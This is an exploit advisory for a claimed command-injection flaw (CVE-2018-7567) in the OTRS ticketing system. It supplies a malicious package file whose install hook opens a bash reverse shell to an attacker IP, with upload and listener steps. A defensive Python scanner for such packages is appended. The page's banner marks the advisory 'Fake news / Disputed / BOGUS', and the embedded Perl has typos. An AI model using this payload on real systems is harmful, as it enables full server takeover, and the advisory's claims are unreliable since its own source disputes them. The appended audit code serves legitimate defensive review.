WARNING! Fake news / Disputed / BOGUS

OTRS 5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1 Command Injection

2018.03.04
Credit: Ali BawazeEer
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: OTRS Authenticated file upload
# Date: 03-03-2018
# Exploit Author: Ali BawazeEer
# Vendor Homepage: https://www.otrs.com/
# Software Link: http://ftp.otrs.org/pub/otrs/
# Version: 5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1
# Tested on: OTRS 5.0.2/CentOS 7.2.1511
# CVE : CVE-2018-7567

# Vulnerability Description:

authenticated admins are able to exploit a Blind Remote Code Execution vulnerability by loading a crafted malicious opm file with an embedded codeinstall tag to execute a command on the server during package installation.

- Proof opm file to upload

<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
    <Name>MyModule</Name>
    <Version>1.0.0</Version>
    <Vendor>My Module</Vendor>
    <URL>http://otrs.org/</URL>
    <License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
    <ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
    <Description Lang="en">MyModule</Description>
    <Framework>5.x.x</Framework>
    <BuildDate>2016-09-23 11:17:41</BuildDate>
    <BuildHost>opms.otrs.com</BuildHost>
    <Framework>5.0.x</Framework>
    <IntroInstall Lang="en" Title="My Module" type="pre">
        &lt;br&gt;
        Hello wolrd
        &lt;br&gt;
        ((Hello!))
        &lt;br&gt
    </IntroInstall>
    <CodeInstall type="pre">
        print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &);
    </CodeInstall>
    <CodeInstall Type="post">
        # create the package name
        my $CodeModule = 'var::packagesetup::' . $Param{Structure}-&gt;{Name}-&gt;{Content};
        $Kernel::OM-&gt;Get($ModeModule)-%gt;CodeInstall();
    </CodeInstall>
    <CodeUninstall type="pre">
        my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content};
        $Kernel::OM-&gt;Get($CodeModule)-&gt;CodeUninstall();
    </CodeUninstall>
</otrs_package>

- Steps:

- Go to package manager from administrator panel
- Save the above code in opm file and upload it as package
- change the ip address to your attacking machine and setup netcat listener

# =================================================EOF =======================================================
#
# Risk : attackers are able to gain full access to the server after uploading malicious opm file
# and thus have total control over the web server,
#
# Vulnerability Limitation : Admin access needed to escalate the privilege from application level to control the server
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
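
For reviewing a package before an administrator installs it, the following added example (not part of the advisory and not OTRS code) lists every code section of an .opm file and marks the ones that hand a string to the operating system. The function name audit_opm, the pattern list and the sample package are assumptions constructed for illustration.

```python
import html
import re

# Package tags whose body OTRS runs as Perl during package operations.
CODE_TAGS = ("CodeInstall", "CodeUpgrade", "CodeUninstall", "CodeReinstall")

# Perl constructs that pass a string to the operating system (triage
# heuristics, assumed for this example; not an exhaustive list).
OS_EXEC = {
    "qx": re.compile(r"\bqx\s*[^\w\s]"),
    "backticks": re.compile(r"`[^`]+`"),
    "system/exec": re.compile(r"\b(?:system|exec)\s*[(\"'$@]"),
    "/dev/tcp": re.compile(r"/dev/(?:tcp|udp)/"),
}

# Regex instead of an XML parser: a raw '&' inside a code body, as in the
# proof file above, is not well-formed XML and would abort a strict parse.
SECTION = re.compile(
    r"<(%s)\b([^>]*)>(.*?)</\1\s*>" % "|".join(CODE_TAGS),
    re.DOTALL | re.IGNORECASE,
)

# Constructed sample package (harmless command, made up for this example).
SAMPLE_OPM = """<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
  <Name>ConstructedSample</Name>
  <CodeInstall Type="pre">print qx(id > /tmp/opm-audit-sample 2>&1);</CodeInstall>
  <CodeInstall Type="post">
    my $CodeModule = 'var::packagesetup::' . $Param{Structure}-&gt;{Name}-&gt;{Content};
    $Kernel::OM-&gt;Get($CodeModule)-&gt;CodeInstall();
  </CodeInstall>
</otrs_package>
"""

def audit_opm(text):
    """Return one finding per code section: tag, attributes, OS-exec hits."""
    findings = []
    for tag, attrs, body in SECTION.findall(text):
        code = html.unescape(body)  # bodies are entity-encoded Perl
        hits = sorted(name for name, rx in OS_EXEC.items() if rx.search(code))
        findings.append({"tag": tag, "attrs": attrs.strip(), "os_exec": hits})
    return findings

if __name__ == "__main__":
    for finding in audit_opm(SAMPLE_OPM):
        print(finding)
```

Every section the function returns is code that runs with the privileges of the OTRS process, so an empty os_exec list means "no shell-out pattern matched", not "safe".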

